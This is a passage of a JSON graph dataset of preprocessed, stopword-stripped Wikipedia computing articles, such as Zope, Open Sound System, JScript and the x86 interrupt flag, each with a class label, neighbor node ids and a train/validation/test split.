      5960,
      8520,
      10185,
      4429,
      11343,
      7248,
      1362,
      467,
      9682,
      7512,
      8921,
      735,
      6367,
      4194,
      11646,
      5732,
      1001,
      10090,
      3819,
      7660,
      8181,
      7415,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 591,
    "label": 2,
    "text": "Irina_Blok:irina blok irina blok born c. 1977 graphic designer artist best known creation google android logo including green robot icon irina blok appeared abc reality show shark tank one contestants designs featured nbc ny usa today sf weekly french edition elle magazine multiple publications around world born st petersburg russia blok moved u.s. 1995 studied graphic design san jose state university started career landor associates brand designer helped create evolve brands hp visa h r block fedex continued career number tech companies including yahoo google adobe course career design work appeared communication arts magazine magazine aiga ci annual creative review also directed study advisor graphic design mfa program academy art university san francisco",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 592,
    "label": 2,
    "text": "W._Richard_Stevens:w. richard stevens william richard rich stevens february 5 1951september 1 1999 northern rhodesia-born american author computer science books particular books unix tcp/ip richard stevens born 1951 luanshya northern rhodesia zambia father worked copper industry family later moved salt lake city hurley new mexico washington d.c. phalaborwa south africa stevens attended fishburne military school waynesboro virginia received bachelor degree aerospace engineering university michigan 1973 master degree 1978 phd 1982 systems engineering university arizona moved tucson 1975 employed kitt peak national observatory computer programmer 1982 1982 1990 vice president computing services health systems international new connecticut stevens moved back tucson 1990 pursued career author consultant also avid pilot part-time flight instructor 1970s stevens died 1999 age 48 2000 posthumously awarded usenix lifetime achievement award stevens also co-authored several ietf request comments rfc documents informational documents ipv6 updates berkeley sockets api standards document tcp congestion control",
    "neighbors": [
      4320,
      98,
      5506,
      8516,
      8682,
      10924,
      5486,
      3695,
      8432,
      3218,
      5492,
      5531,
      5470,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 593,
    "label": 2,
    "text": "Open_Sound_System:open sound system open sound system oss interface making capturing sound unix unix-like operating systems based standard unix devices system calls i.e posix read write ioctl etc. term also sometimes refers software unix kernel provides oss interface thought device driver collection device drivers sound controller hardware goal oss allow writing sound-based applications agnostic underlying sound hardware oss created hannu savolainen distributed four license options three free software licences thus making oss free software api designed use traditional unix framework open read write ioctl via special devices instance default device sound input output /dev/dsp examples using shell project initially free software following project success savolainen contracted company 4front technologies made support newer sound devices improvements proprietary response eventually linux community abandoned oss/free implementation included kernel development effort switched replacement advanced linux sound architecture alsa linux distributions ubuntu chosen disable oss support kernels ignore bugs filed oss4 packages although oss support may re-enabled ubuntu spite several operating systems freebsd continued distribute previous versions oss continue maintain improve versions july 2007 4front technologies released sources oss cddl opensolaris gpl linux january 2008 4front technologies released oss freebsd bsd systems bsd license freebsd contains independently developed implementation oss api includes among things in-kernel resampling mixing vchans equalizer surround sound independent volume control application also supports bit-perfect mode netbsd openbsd support compatibility mode oss api providing codice_1 header file codice_2 library internally operate using native sun-like audio interface solaris opensolaris uses fork oss4 called boomer combines oss4 framework audio mixer together sun earlier sada /dev/audio api oss/3d plugin music players acts audio postprocessing engine supported players include winamp windows media player 9 later musicmatch sonique foobar2000 jetaudio xmms ported windows linux platforms unlike oss shareware 4front oss3d later renamed joesoft hear linux kernel historically two uniform sound apis used one oss alsa advanced linux sound architecture alsa available linux one implementation alsa interface alsa refers equally implementation interface oss audio api linux 2.4 series official kernel.org linux kernels alsa added starting 2.5 versions linux kernel authors marked oss deprecated 4front continued develop oss outside linux kernel alsa provides optional oss emulation mode appears programs oss similarly alsa emulation mode linux implementation oss oss api software criticized developers paul davis jack audio connection kit lennart poettering competing pulseaudio criticisms either specific linux implementation oss api addressed oss version 4",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      2109,
      6213,
      9799,
      8268,
      10851,
      11363,
      5222,
      10856,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      5397,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      9533,
      318,
      2368,
      3911,
      6988,
      10063,
      5975,
      2908,
      10091,
      7027,
      5492,
      7540,
      8573,
      1406,
      8065,
      8066,
      900,
      5514,
      1932,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      10149,
      4521,
      4011,
      8621,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      5612,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 594,
    "label": 3,
    "text": "Aperture_(computer_memory):aperture computer memory computing aperture portion physical address space i.e physical memory associated particular peripheral device memory unit apertures may reach external devices rom ram chips internal memory cpu typically memory device attached computer accepts addresses starting zero system one device would ambiguous addressing resolve memory logic contain several aperture selectors containing range selector interface one memory devices set selector address ranges apertures disjoint cpu presents physical address within range recognized aperture aperture unit routes request address remapped zero base attached device thus apertures form layer address translation level usual virtual-to-physical mapping",
    "neighbors": [
      1801,
      1967,
      1776,
      3702,
      5598,
      799
    ],
    "mask": "Test"
  },
  {
    "node_id": 595,
    "label": 8,
    "text": "Zope:zope zope family free open-source web application servers written python associated online community zope stands z object publishing environment first system using common object publishing methodology web zope recognized python killer app application helped put python spotlight last years zope community spawned several additional web frameworks disparate aims principles sharing philosophy people source code zope 2 still widespread frameworks largely thanks plone content management system runs zope 2 bluebream earlier called zope 3 less widespread underlies several large sites including launchpad grok started programmer-friendly framework zope 3 cavemen 2009 pyramid ex bfg gained popularity zope community minimalistic framework based zope principles zope corporation formed 1995 fredericksburg virginia name digital creations joint venture infinet joint newspaper chain venture company developed classified advertisement engine internet 1997 company became independently owned private company software engineers led cto jim fulton pythonlabs creators python became part company 2000 python founder guido van rossum left zope corp 2003 known zope 2 began merging three separate software products – bobo document template bobopos – principia application server behest largest investor opticality ventures principia re-released free software name zope 1998 bobo therefore zope first web object publishing solution november 2004 zope 3 released zope 3 complete rewrite preserves original zodb object database directly intended enterprise web application development using newest development paradigms zope 3 however compatible zope 2 run zope 2 applications zope 3 originally intended introduce backwards-compatibility layer zope 2 software would run zope 3 instead module known five introduced new zope 3 paradigms zope 2 although full compatibility n't possible way either existence two incompatible web frameworks called zope caused lot confusion response january 2010 zope 3 renamed bluebream zope blue bream names kind fish ballerus ballerus zope foundation organization promotes development zope platform supporting community develops maintains relevant software components community includes open source software documentation web infrastructure contributors well business organization consumers software platform manages zope.org websites infrastructure open source collaboration zope website usually composed objects zope object database files file system usual web servers allows users harness advantages object technologies encapsulation zope maps urls objects using containment hierarchy objects methods considered contained objects well data stored databases well file system zodb common solution zope provides two mechanisms html templating document template markup language dtml zope page templates zpt dtml tag-based language allows implementation simple scripting templates dtml provisions variable inclusion conditions loops however dtml problematic dtml tags interspersed html form non-valid html documents use requires care including logic templates retain code readability use dtml discouraged many leading zope developers zpt technology addresses shortcomings dtml zpt templates either well-formed xml documents html documents special markup presented attributes tal template attribute language namespace zpt offers limited set tools conditional inclusion repetition xml elements consequently templates usually quite simple logic implemented python code one significant advantage zpt templates edited graphical html editors zpt also offers direct support internationalization zope 2 underlies plone content management system well erp5 open source enterprise resource planning system bluebream rewrite zope developers zope 2 web application server created name zope 3 existence two incompatible frameworks name caused much confusion zope 3 renamed bluebream january 2010 bluebream distributed terms zope public license thus free software zope 2 proven useful framework web applications development use revealed shortcomings name creating zope 2 products involves copying lot boilerplate code – magic code – built-in management interface difficult modify replace zope 3 rewrite software attempts address shortcomings retaining advantages zope led popularity bluebream based component architecture makes easy mix software components various origins written python although originally intended replacement zope 2 zope component architecture instead backported zope 2 starting zope 2.8 many zope platforms plone going type piece-by-piece rewriting first production release new software zope x3 3.0.0 released november 6 2004 zope 3 project started february 2001 effort develop new version zope almost complete rewrite goal retain successful features zope 2 trying fix shortcomings goal create developer-friendly flexible platform programming web applications zope 2 project began development component architecture allows structuring code small composable units introspectable interfaces interfaces supported interface package order provide functionality explicitly declared interfaces python language first production release software zope x3 released november 6 2004 january 2010 zope 3 renamed bluebream goal project enable programmers use zope order expose arbitrary python objects model objects web without need make objects fulfill particular behavior requirements zope 2 many behavior requirements allow objects participate framework resulted large amount mixin base classes special attributes bluebream uses model/view architecture separating presentation code problem domain code views models linked together component architecture libraries underlying bluebream evolving collection useful libraries web application development rather single monolithic application server bluebream includes separate packages interfaces component architecture http server publisher zope object database zodb zope page templates i18n security policy component architecture used glue together component architecture configured using zcml zope configuration markup language xml based configuration file language zope 3 project pioneered practice sprints open source software development sprints intensive development sessions programmers often different countries gather one room work together couple days even several weeks sprints various practices drawn agile software development used pair programming test-driven development besides goal developing software sprints also useful geographically separated developers meet person attracting new people project also serve way participants learn bluebream considered stable framework used production projects worldwide notably launchpad result development zope 3 bluebream many independent python packages used developed part bluebream although many usable outside bluebream many zope toolkit ztk project started clarify packages usable outside bluebream improve re-usability packages thus zope toolkit base zope frameworks zope 2.12 first release web framework builds zope toolkit grok bluebream set releases based ztk 2010 2006 grok project started number zope 3 developers wanted make zope 3 technology agile use accessible newcomers grok since seen regular releases core technology martian grokcore.component also finding uptake zope 3 zope 2 based projects late 2017 development began zope 4 zope 4 successor zope 2.13 making many changes backwards compatible zope 2 mentioned previously zope page templates xhtml documents means viewed edited using normal html editors xhtml compliant tools big advantage compared template languages used web applications templates also checked xhtml compliance fairly confident automatically expand proper xhtml however page templates meant rendered instead marked additional elements attributes special xml namespaces see additional information used describe page template ultimately processed basic examples conditionally include particular element like div element simply add tal condition attribute element follows control appears inside element use tal content attribute like finally introduce replace values attributes use tal attributes attribute use python alter href runtime cursory explanation zope page templates behavior zope page templates almost completely described template language fixed tal tales metal specifications schooltool open source student information system uses zope",
    "neighbors": [
      9229,
      2062,
      7695,
      2576,
      9245,
      9762,
      8739,
      2596,
      11307,
      44,
      5165,
      10800,
      6714,
      11338,
      595,
      84,
      102,
      11376,
      119,
      3705,
      11386,
      148,
      8350,
      3746,
      3237,
      4777,
      7338,
      9387,
      11439,
      8883,
      692,
      190,
      225,
      1250,
      4837,
      6379,
      2287,
      7412,
      7430,
      7443,
      1812,
      1307,
      6941,
      10526,
      7457,
      8994,
      3876,
      7980,
      7983,
      7987,
      1353,
      1363,
      4439,
      6493,
      865,
      2404,
      8554,
      9580,
      10611,
      10622,
      3966,
      1920,
      11134,
      4485,
      3462,
      8582,
      9614,
      7567,
      1937,
      11682,
      9125,
      10670,
      4529,
      5048,
      6074,
      9666,
      8644,
      1991,
      4056,
      3545,
      479,
      3052,
      5612,
      8691,
      11259
    ],
    "mask": "Test"
  },
  {
    "node_id": 596,
    "label": 2,
    "text": "LADSPA:ladspa ladspa acronym linux audio developer simple plugin api application programming interface api standard handling audio filters audio signal processing effects licensed gnu lesser general public license lgpl originally designed linux consensus linux audio developers mailing list works variety platforms used many free audio software projects wide range ladspa plug-ins available ladspa exists primarily header file written programming language c. many audio plugin standards major modern software synthesizers sound editors support variety best known standard probably steinberg cubase virtual studio technology ladspa unusual attempts provide greatest common divisor standards means scope limited simple plugins written using easy embed many programs standard changed little time compatibility problems rare dssi extends ladspa cover instrument plugins lv2 successor based ladspa dssi permitting easy extensibility allowing custom user interfaces midi messages custom extensions",
    "neighbors": [
      9783,
      5612,
      823,
      7983,
      11316,
      3799,
      8856,
      6810,
      2908,
      2045,
      7550
    ],
    "mask": "None"
  },
  {
    "node_id": 597,
    "label": 3,
    "text": "Sun_Fire:sun fire sun fire series server computers introduced 2001 sun microsystems since 2010 part oracle corporation sun fire branding coincided introduction ultrasparc iii processor superseding ultrasparc ii-based sun enterprise series 2003 sun broadened sun fire brand introducing sun fire servers using intel xeon processor 2004 early intel xeon models superseded models powered amd opteron processors also 2004 sun introduced sun fire servers powered ultrasparc iv dual-core processor 2007 sun introduced intel xeon sun fire servers continuing offer amd opteron versions well sparc-based sun fire systems produced 2010 x86-64 based machines marketed mid-2012 mid-2012 oracle corporation ceased use sun fire brand new server models ultrasparc-based sun fire models licensed run solaris operating system versions 8 9 10 although officially supported linux versions also available third parties well openbsd netbsd intel xeon amd opteron based sun fire servers support solaris 9 10 openbsd red hat enterprise linux versions 3 6 suse linux enterprise server 10 11 windows 2000 windows server 2003 2008 2008 r2 later sun fire model numbers prefixes indicating type system thus sun offered intel xeon amd opteron sun fire servers v-series sub brand sun used x suffix denote intel xeon processor based systems z suffix amd opteron processor based systems convention later dropped z suffix also used previously differentiate v880z visualization server variant v880 server sun first-generation blade server platform sun fire b1600 chassis associated blade servers branded sun fire server brand later sun blade systems sold sun blade brand 2007 sun fujitsu fujitsu siemens introduced common sparc enterprise brand server products first sparc enterprise models fujitsu-developed successors midrange high-end sun fire e-series addition sun fire t1000 t2000 servers rebranded sparc enterprise t1000 t2000 sold fujitsu brands although sun continued offer original names later t-series servers also badged sparc enterprise rather sun fire since late 2010 oracle corporation longer uses sun fire brand current series sparc servers since mid-2012 new x series x86-64 machines based intel xeon cpus x86-64 server models developed sun microsystems acquisition still production rebranded sun server x-series servers produced two versions original version later rohs version since general maintenance upgrade guideline rohs components spares may installed original non-rohs versions server end-of-life eol date server deemed eol date rohs version server listing 2012 x86 server range continued sun server oracle server names",
    "neighbors": [
      1539,
      9731,
      10789,
      5677,
      4664,
      1594,
      10327,
      11363,
      10340,
      7270,
      5233,
      9333,
      631,
      4217,
      9343,
      1675,
      4235,
      4241,
      2710,
      8863,
      8353,
      8871,
      1707,
      2731,
      3247,
      6322,
      2237,
      4285,
      6338,
      10436,
      6341,
      3285,
      1755,
      2269,
      1250,
      9955,
      5356,
      5872,
      8434,
      1788,
      3328,
      1801,
      1809,
      4886,
      1818,
      8994,
      1316,
      9010,
      9012,
      823,
      2871,
      10553,
      6464,
      3911,
      8007,
      2895,
      3919,
      8539,
      5471,
      4960,
      11626,
      7022,
      11636,
      1399,
      11129,
      9090,
      3973,
      403,
      9111,
      7065,
      7072,
      9137,
      6071,
      7104,
      9665,
      1480,
      5073,
      10200,
      6107,
      1000,
      4074,
      7148,
      8179
    ],
    "mask": "Test"
  },
  {
    "node_id": 598,
    "label": 4,
    "text": "Raz-Lee:raz-lee raz-lee security inc. international organization provides data security solutions ibm power servers company clients include fiat agfa teva pharmaceuticals avnet aig dun bradstreet israel branch american insurance company american international group among others founded 1983 company formerly headquartered herzliya israel 1992 33 company products sold united states 1994 1996 business offices nanuet new york dramatically increased though primary purchasers still spread europe middle east africa 2009 company headquartered nanuet research development facility israel company also offices israel italy maintains technical support us account management center san francisco company best known product consists 15 individual products intended protect monitor information assets insider threat unauthorized external access",
    "neighbors": [
      3880,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 599,
    "label": 3,
    "text": "Bee_Card:bee card rom cartridge developed hudson soft software distribution medium msx computers bee cards approximately size credit card thicker compared game cartridges bee card small compact card size atari corporation also adopted atari portfolio handheld pc released 1989 also used korg synthesizers workstations external storage user content like sound programs song data small number msx software titles published bee card order accept bee card cartridge slot msx fitted removable adapter hudson soft beepack first mass-produced bee cards however eeprom telephone cards manufactured mitsubishi plastics first sold japan 1985 trade names bee card bee pack derive hudson soft corporate logo features cartoon bee hudson soft software publishers distributed least eleven msx software titles bee card hudson soft later collaborated nec develop video game console called pc engine companies elected use hudson soft slim rom cartridge technology distribute pc engine software hudson soft adapted design needs produced hucard hucards slightly thicker bee cards also whereas bee card 32 pins hucard 38",
    "neighbors": [
      8355,
      4518,
      7079,
      9006,
      1527,
      4216,
      10010
    ],
    "mask": "None"
  },
  {
    "node_id": 600,
    "label": 4,
    "text": "Awards_received_by_Edward_Snowden:awards received edward snowden awards received edward snowden part reactions global surveillance disclosures made edward snowden subject controversy snowden variously called hero whistleblower dissident patriot traitor honored publications organizations based europe united states edward snowden voted guardian person year 2013 garnering four times number votes candidate 2013 list leading global thinkers published annually foreign policy placed snowden first place due impact revelations fp global conversation visualization showed snowden occupied role 2013 global news media coverage slightly less important president barack obama snowden headed techrepublic ten tech heroes 2013 editor jack wallen noted besides raising public awareness surveillance government secrecy snowden leaks significant technology professionals snowden named time ′s person year runner-up 2013 behind pope francis time criticized placing top spot 2014 snowden named among time 100 influential people world february 2014 snowden joined board directors freedom press foundation co-founded pentagon papers leaker daniel ellsberg journalists glenn greenwald laura poitras also sit board july 2014 freie universität berlin announced snowden accepted offer honorary membership recognition university called extraordinary achievements defense transparency justice freedom apart honor rights privileges duties involved edward snowden awarded biennial german whistleblower prize august 2013 absentia accompanying award equal €3,000 established 1999 award sponsored german branch international association lawyers nuclear arms federation german scientists organizers berlin said prize acknowledge bold efforts expose massive unsuspecting monitoring storage communication data accepted democratic societies october 2013 sam adams award presented snowden moscow group four visiting american former intelligence officers whistleblowers two months asylee snowden made first public appearance accept award candlestick holder meant symbolize bringing light dark corners visit one presenters—fbi whistleblower jesselyn radack government accountability project—became snowden lawyer week later radack wrote nation snowden exemplified sam adams courage persistence devotion truth—no matter consequences snowden chosen give britain 2013 alternative christmas message channel 4 non-establishment parallel royal christmas message queen elizabeth ii short piece filmed laura poitras snowden spoke government surveillance terms george orwell classic novel nineteen eighty-four – arguing modern surveillance capabilities far surpass imagined big brother february 2014 snowden elected rector university glasgow ceremonial post student body representative chosen students historic office wide margin votes even though nomination like several past rectors purely symbolic gesture served three-year term absentia german big brother awards gala april 11 2014 edward snowden honored first-ever julia winston award positive award named two main rebellious characters orwell nineteen eighty-four award endowed one million stickers calling german government grant asylum snowden award organizers digitalcourage made stickers available free online public distribute throughout germany april 2014 snowden laura poitras awarded ridenhour truth-telling prize given nation institute fertel foundation transparency whistleblowing snowden poitras appeared video national press club accept award snowden gave speech took questions audience accorded several standing ovations speech questioned swiftly charged crimes whereas director national intelligence james clapper even reprimanded famous lie congress december 2014 snowden shared joint honorary award alan rusbridger editor guardian swedish right livelihood award foundation also december 2014 snowden shared international league human rights annual carl von ossietzky medal journalists glenn greenwald laura poitras 2014 snowden nominated iq award members non-profit organization mensa germany although official iq award commission confirmed nomination managing board mensa threatened commission subdue snowden nomination violated mensa bylaws german mensa board also reaction talks mensa international consequently possible mensa members vote snowden caused big controversies among mensa members leading effect opposing mensa members agreed vote protest actor jonny lee miller nonsensical nominee thus election 2016 norwegian chapter pen international awarded snowden ossietzky prize given outstanding achievements within field freedom expression snowden applied norway safe passage pick prize courts said unable legally rule anything snowden country received formal extradition request",
    "neighbors": [
      208,
      8356,
      3495
    ],
    "mask": "Train"
  },
  {
    "node_id": 601,
    "label": 6,
    "text": "My_Network_Places:network places network places formerly network neighborhood network browser feature windows explorer first introduced windows 95 windows nt 4.0 renamed network places windows 2000 later network places maintains automatically-updated history computers user accessed default placed folder called nethood found user user profile default location changed modifying pair nethood registry entries found registry keys codice_1 codice_2 feature also allows enumerating computers local network support server message block smb protocol open discovery workgroup fewer 32 computers list network destinations network places generated one computers network designated browse master sometimes called master browser browse master elected system strength sometimes similar systems connected network might conflict browse masters unexpected consequences disappearance list altogether system becoming unreachable system forced decline browse master status disabling browser service rebooting workgroup 32 computers shortcuts created automatically user opens shared network resource printer shared folder starting windows vista network places removed favor integrated network node windows explorer node enumerate network computers via ws-discovery upnp protocols addition smb",
    "neighbors": [
      5221,
      425,
      2221,
      6797,
      8080,
      3250,
      9620,
      5749,
      9819
    ],
    "mask": "None"
  },
  {
    "node_id": 602,
    "label": 3,
    "text": "Interrupt_flag:interrupt flag interrupt flag system flag bit x86 architecture flags register determines whether central processing unit cpu handle maskable hardware interrupts bit bit 9 flags register may set cleared programs sufficient privileges usually determined operating system flag set codice_1 maskable hardware interrupts handled cleared set codice_2 interrupts ignored affect handling non-maskable interrupts nmis software interrupts generated int instruction flag may set cleared using cli clear interrupts sti set interrupts popf pop flags instructions cli clears sets 0 sti sets 1 popf pops 16 bits stack flags register means set cleared based ninth bit top stack three cases privileged applications usually os kernel may modify note applies protected mode code real mode code may always modify cli sti privileged instructions trigger general protection fault unprivileged application attempts execute popf simply modify flag application unprivileged privilege level required execute cli sti instruction set using popf determined iopl i/o privilege level eflags iopl set 2 example program running ring 0 execute cli modern operating systems set iopl 0 kernel execute cli/sti reason since clearing force processor ignore interrupts kernel may never get control back set 1 old dos programs use protected mode dos extender install interrupt handlers usually games use cli instruction handlers disable interrupts either popf corresponding pushf iret restores flags stack part effects restore works program started real mode causes problems programs run dpmi-based container modern operating systems ntvdm windows nt later since cli privileged instruction triggers fault operating system program attempts use os typically stops delivering interrupts program program executes sti would cause another fault however popf instruction privileged simply fails silently restore result os stops delivering interrupts program hangs dos programs use protected mode extender suffer problem execute v86 mode popf trigger fault satisfactory resolutions issue usually possible modify program source code typically available room instruction stream introduce sti without massive editing assembly level removing cli program causing v86 host ignore cli completely might cause bugs guest interrupt handlers re-entrant safe though executed modern processor typically execute fast enough avoid overlapping interrupts cli commonly used synchronization mechanism uniprocessor systems example cli used operating systems disable interrupts kernel code typically driver avoid race conditions interrupt handler note cli affects interrupt flag processor executed multiprocessor systems executing cli instruction disable interrupts processors thus driver/interrupt handler race condition still occur processors may service interrupts execute offending interrupt handler systems synchronization mechanisms locks must used addition cli/sti prevent race conditions hlt instruction halts interrupt occurs combination cli followed hlt commonly used intentionally hang computer sti instruction enables interrupts setting one interesting quirk sti instruction unlike cli immediate effect interrupts actually enabled instruction immediately following sti one side effect could if=0 executing cli instruction immediately sti instruction means interrupts never recognized sti instruction sets flag interrupts checked next instruction case would cli takes effect immediately behavior exists processor constantly takes interrupts still make forward progress see ia-32 manuals details",
    "neighbors": [
      5380,
      518,
      9739,
      9996,
      6806,
      4385,
      6184,
      3630,
      7983,
      5040,
      9911,
      5823,
      6596,
      9668,
      9158,
      585,
      7501,
      5457,
      4695,
      5080,
      477,
      3294,
      1247,
      4450,
      1776,
      7281,
      5234,
      499,
      372,
      3699,
      9331,
      1915,
      1660,
      7421,
      1791
    ],
    "mask": "Train"
  },
  {
    "node_id": 603,
    "label": 9,
    "text": "JScript:jscript jscript microsoft dialect ecmascript standard used microsoft internet explorer jscript implemented active scripting engine means plugged ole automation applications support active scripting internet explorer active server pages windows script host also means applications use multiple active scripting languages e.g. jscript vbscript perlscript jscript first supported internet explorer 3.0 browser released august 1996 recent version jscript 9.0 included internet explorer 9 jscript 10.0 separate dialect also known jscript .net adds several new features abandoned fourth edition ecmascript standard must compiled .net framework version 2 version 4 static type annotations optional explained douglas crockford talk titled javascript programming language yui theater however jscript supports conditional compilation allows programmer selectively execute code within block comments extension ecmascript standard supported javascript implementations thus making statement completely true although conditional compilation longer supported internet explorer 11 standards mode internal implementation differences javascript jscript point time noted microsoft developer network although default type value script element internet explorer javascript jscript alias apparent transition jscript javascript online microsoft edge developer guide refers mozilla mdn web reference library definitive documentation october 2017 microsoft msdn pages scripting internet explorer redirected well information may include jscript specific objects enumerator listed javascript language reference microsoft docs provide additional features included ecma standards whether supported edge browser predecessor original jscript active scripting engine like active scripting languages built com/ole automation platform provides scripting capabilities host applications version used hosting jscript inside web page displayed internet explorer html application classic asp windows script host scripts several automation environments jscript sometimes referred classic jscript active scripting jscript differentiate newer .net-based versions versions jscript available multiple versions internet explorer windows example jscript 5.7 introduced internet explorer 7.0 also installed internet explorer 6.0 windows xp service pack 3 jscript 5.8 introduced internet explorer 8.0 also installed internet explorer 6.0 windows mobile 6.5 microsoft implementation ecmascript 5th edition windows 8 consumer preview called javascript corresponding visual studio 11 express beta includes “ completely new ” full-featured javascript editor intellisense enhancements html5 ecmascript 5 syntax “ vsdoc ” annotations multiple overloads simplified dom configuration brace matching collapsible outlining “ go definition ” jscript also available windows ce included windows mobile optional windows embedded ce windows ce version lacks active debugging jscript .net microsoft .net implementation jscript cls language thus inherits powerful features lacks many features original jscript language making inappropriate many scripting scenarios jscript .net used asp.net pages complete .net applications lack support language microsoft visual studio places upgrade path classic asp using classic jscript new first-class language jscript .net supported .net compact framework note jscript .net versions related classic jscript versions jscript .net separate product even though jscript .net supported within visual studio ide versions sync .net languages versions c vb.net vc++ follow corresponding visual studio versions .net framework 3.0 3.5 built top 2.0 include newer jscript.net release version 10.0 .net framework 4.0",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      6171,
      540,
      3102,
      1055,
      7713,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      10282,
      4143,
      9263,
      9780,
      1077,
      2101,
      6709,
      8246,
      10808,
      11316,
      10812,
      3648,
      10819,
      10310,
      1098,
      4170,
      4171,
      4173,
      4174,
      7754,
      9808,
      10828,
      4178,
      83,
      84,
      9813,
      10839,
      8281,
      9819,
      92,
      608,
      1632,
      2145,
      3170,
      5219,
      8289,
      622,
      9839,
      9328,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      4231,
      6791,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10387,
      10900,
      8854,
      10902,
      3224,
      4248,
      11414,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      3761,
      5300,
      7351,
      6143,
      10428,
      2749,
      5311,
      7871,
      10431,
      2244,
      8391,
      200,
      9420,
      214,
      4822,
      9943,
      2777,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      7396,
      4326,
      2279,
      3303,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      259,
      10507,
      6927,
      3856,
      9491,
      790,
      3351,
      11030,
      5401,
      4378,
      5913,
      8473,
      8985,
      8988,
      7455,
      4384,
      9505,
      11546,
      803,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      1837,
      10029,
      7983,
      11570,
      1844,
      9525,
      11060,
      10039,
      11572,
      315,
      6972,
      2880,
      321,
      3394,
      5952,
      1348,
      844,
      847,
      11087,
      3922,
      339,
      1366,
      4439,
      9560,
      5465,
      10079,
      11616,
      2401,
      2402,
      2919,
      11625,
      4458,
      5483,
      6506,
      9066,
      10097,
      9587,
      9593,
      2943,
      1409,
      3462,
      9609,
      1418,
      5003,
      5004,
      6028,
      9612,
      8080,
      7064,
      9114,
      8605,
      10654,
      8607,
      11677,
      929,
      11683,
      4010,
      5546,
      10157,
      430,
      6062,
      10673,
      438,
      9655,
      6584,
      1978,
      2493,
      960,
      9152,
      9665,
      8132,
      6088,
      969,
      7629,
      3535,
      9167,
      8659,
      11223,
      4056,
      1498,
      5594,
      478,
      8161,
      482,
      6114,
      6115,
      487,
      9195,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 604,
    "label": 3,
    "text": "Memory_disambiguation:memory disambiguation memory disambiguation set techniques employed high-performance out-of-order execution microprocessors execute memory access instructions loads stores program order mechanisms performing memory disambiguation implemented using digital logic inside microprocessor core detect true dependencies memory operations execution time allow processor recover dependence violated also eliminate spurious memory dependencies allow greater instruction-level parallelism allowing safe out-of-order execution loads stores attempting execute instructions order microprocessor must respect true dependencies instructions example consider simple true dependence example codice_1 instruction line 2 dependent codice_1 instruction line 1 register r1 source operand addition operation line 2 codice_1 line 2 execute codice_1 line 1 completes case dependence static easily determined microprocessor sources destinations registers destination register codice_1 instruction line 1 codice_6 part instruction encoding determined microprocessor early decode stage pipeline similarly source registers codice_1 instruction line 2 codice_6 codice_9 also encoded instruction determined decode respect true dependence microprocessor scheduler logic issue instructions correct order instruction 1 first followed instruction 2 results 1 available instruction 2 needs complications arise dependence statically determinable non-static dependencies arise memory instructions loads stores location operand may indirectly specified register operand rather directly specified instruction encoding store instruction writes value memory location specified value address r2+2 load instruction reads value memory location specified value address r4+4 microprocessor statically determine prior execution memory locations specified two instructions different location locations depend values r2 r4 locations different instructions independent successfully executed order however locations load instruction dependent store produce value known ambiguous dependence executing loads stores order produce incorrect results dependent load/store pair executed order consider following code snippet given mips assembly assume scheduling logic issue instruction execution unit register operands ready assume registers codice_10 codice_11 ready values codice_10 codice_11 computed long time ago changed however assume codice_14 ready value still process computed codice_15 integer divide instruction finally assume registers codice_10 codice_11 hold value thus loads stores snippet access memory word situation codice_18 instruction line 2 ready execute codice_19 instruction line 3 ready processor allows codice_20 instruction execute codice_21 load read old value memory system however read value written codice_21 load store executed program order memory dependence violated similarly assume register codice_23 ready codice_24 instruction line 4 also ready execute may execute preceding codice_19 line 3 occurs codice_19 instruction read wrong value memory system since later store instruction wrote value load executed memory dependencies come three flavors three dependencies shown preceding code segment reproduced clarity modern microprocessors use following mechanisms implemented hardware resolve ambiguous dependences recover dependence violated values store instructions committed memory system modern microprocessors cpu cache execute instead store instructions including memory address store data buffered store queue reach retirement point store retires writes value memory system avoids war waw dependence problems shown code snippet earlier load receives incorrect value memory system later store allowed execute earlier load additionally buffering stores retirement allows processors speculatively execute store instructions follow instruction may produce exception load bad address divide zero etc conditional branch instruction whose direction taken taken yet known exception-producing instruction executed branch direction predicted incorrectly processor fetched executed instructions wrong path instructions executed exception condition occurred speculative instructions executed branch gone direction caused different instructions fetched executed processor must throw away results bad-path speculatively-executed instructions discovers exception branch misprediction complication stores stores bad mispredicted path committed values memory system stores committed values would impossible throw away commit memory state machine would corrupted data store instruction executed thus without store buffering stores execute previous possibly-exception-causing instructions executed caused exception previous branch directions known forcing stores wait branch directions exceptions known significantly reduces out-of-order aggressiveness limits ilp instruction level parallelism performance store buffering stores execute ahead exception-causing unresolved branch instructions buffering data store queue committing values retirement prevents stores mispredicted bad paths committing values memory system still offering increased ilp performance full out-of-order execution stores buffering stores retirement avoids waw war dependencies introduces new issue consider following scenario store executes buffers address data store queue instructions later load executes reads memory address store wrote load reads data memory system read old value would overwritten preceding store data obtained load incorrect solve problem processors employ technique called store-to-load forwarding using store queue addition buffering stores retirement store queue serves second purpose forwarding data completed not-yet-retired in-flight stores 